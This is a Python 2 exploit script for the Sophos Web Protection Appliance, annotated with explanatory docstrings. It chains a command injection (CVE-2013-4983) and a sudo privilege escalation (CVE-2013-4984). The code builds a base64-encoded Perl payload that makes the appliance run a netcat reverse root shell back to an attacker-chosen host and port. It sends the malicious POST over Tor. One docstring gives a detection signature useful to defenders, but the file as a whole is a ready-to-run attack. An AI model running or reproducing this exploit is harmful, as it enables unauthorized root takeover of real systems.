#!/usr/bin/python2
# Exploit for Sophos Web Protection Appliance Command Injection
# Bugs discovered by Core Security Technologies
# I wanted a one-shot remote root exploit, so I wrote one.
# CVE-2013-4983 - the remote command injection part
# CVE-2013-4984 - the local privesc part (gets root)
# infodox - insecurety.net (2013)
import requesocks # because, TOR.
import sys
import time
import threading
def banner():
    """Print the tool's banner.

    In this listing the body is only this docstring -- no ASCII art is
    emitted, so the call in main() is effectively a no-op.
    """
def generate_payload(lhost, lport):
    """Build the command string that inject_command() appends to the request.

    Args:
        lhost: host the target is told to connect back to.
        lport: port on lhost, as a string (it is substituted with str.replace,
            so an int would raise TypeError).

    Returns:
        A ``perl -MIO -e`` one-liner that base64-decodes and eval()s a Perl
        ``system()`` call.  That system() call runs a sudo'd
        /opt/cma/bin/clear_keys.pl (CVE-2013-4984 per the file header) whose
        quoted second argument carries a ``/bin/nc -c /bin/bash`` command;
        how clear_keys.pl ends up executing that argument is not visible here.
    """
    # Template with LHOST/LPORT placeholders; the ';' pairs inside the quoted
    # argument delimit the nc command from the rest of the argument text.
    command = """sudo /opt/cma/bin/clear_keys.pl fakeclientfqdn ";/bin/nc -c /bin/bash LHOST LPORT;" /fakedir" """
    command = command.replace("LHOST", lhost)
    command = command.replace("LPORT", lport)
    runcmd = "system('%s');" %(command) # wrapped in perl's system()
    # Python 2 only: str.encode('base64') is the base64 *codec*, which appends
    # a trailing newline and wraps long output -- hence the strip/replace.
    encoded = runcmd.encode('base64')
    encoded = encoded.strip()
    encoded = encoded.replace('\n', '')
    # Base64 keeps quotes and semicolons out of the injected form field; the
    # decode + eval happens on the target inside perl (MIME::Base64).
    perl = """perl -MIO -e "use MIME::Base64;eval(decode_base64('%s'));";""" %(encoded)
    return perl
def inject_command(ip, payload):
    """Send the CVE-2013-4983 request to ``ip`` with ``payload`` appended to the
    ``domain`` form field.

    Args:
        ip: host (or host:port) of the appliance; only used to build the URL.
        payload: the string returned by generate_payload(); it is pasted into
            the body raw, without URL-encoding.

    The HTTP response is discarded, so nothing here reports whether the
    request was accepted.

    Detection note: the request is a POST to
    ``/end-user/index.php?c=blocked&action=continue`` whose ``domain`` value
    ends in ``%3b`` (``;``) followed by ``perl -MIO -e ...`` -- a ``;`` or a
    shell command inside the ``domain`` parameter of that endpoint is a usable
    signature for web-server logs or a WAF rule.
    """
    url = "https://%s/end-user/index.php?c=blocked&action=continue" %(ip)
    # Fixed form fields; ``url`` is base64 for "http://www.example.com",
    # ``user_encoded`` is base64 for "buffalo".
    body = "url=aHR0cDovL3d3dy5leGFtcGxlLmNvbQ%3d%3d"
    body += "&args_reason=something_different_than_filetypewarn&filetype=dummy&user=buffalo"
    # ``domain`` is the injection point: the trailing ``%3b`` (';') terminates
    # the legitimate value so whatever follows is treated as a separate command.
    body += "&user_encoded=YnVmZmFsbw%3d%3d&domain=http%3a%2f%2fexample.com%3b"
    body += payload
    body += "&raw_category_id=one%7ctwo%7cthree%7cfour"
    session = requesocks.session()
    # All traffic is routed through a local Tor SOCKS5 proxy, hard-coded to
    # 127.0.0.1:9050; there is no fallback if it is not listening.
    session.proxies = {'http': 'socks5://127.0.0.1:9050',
                       'https': 'socks5://127.0.0.1:9050'}
    # verify=False disables TLS certificate validation (presumably because
    # the appliance serves a self-signed cert -- not confirmed here).
    session.post(url, data=body, verify=False)
def main(args):
    """Entry point: read ``<rhost> <lhost> <lport>`` and fire the request.

    ``args`` is accepted but never read -- the function uses sys.argv
    directly, so the argument-count check is against sys.argv too.
    """
    banner()
    if len(sys.argv) != 4:
        sys.exit("Usage: %s <rhost> <lhost> <lport>" %(sys.argv[0]))
    rhost = sys.argv[1]
    lhost = sys.argv[2]
    lport = sys.argv[3]  # kept as a string; generate_payload() substitutes it textually
    payload = generate_payload(lhost, lport)
    print "(*) Target is: %s" %(rhost)
    print "(*) Sending reverse rootshell to %s:%s" %(lhost, lport)
    print "(+) Injecting command, hope you have netcat listener setup"
    # The POST runs on a separate thread that is never joined, so the script
    # reaches the final print regardless of whether the request completes;
    # nothing here reports success or failure.
    threading.Thread(target=inject_command, args=(rhost, payload, )).start()
    print "(?) got root yet?"
# Script entry; main() ignores its argument and reads sys.argv itself.
if __name__ == "__main__":
    main(sys.argv)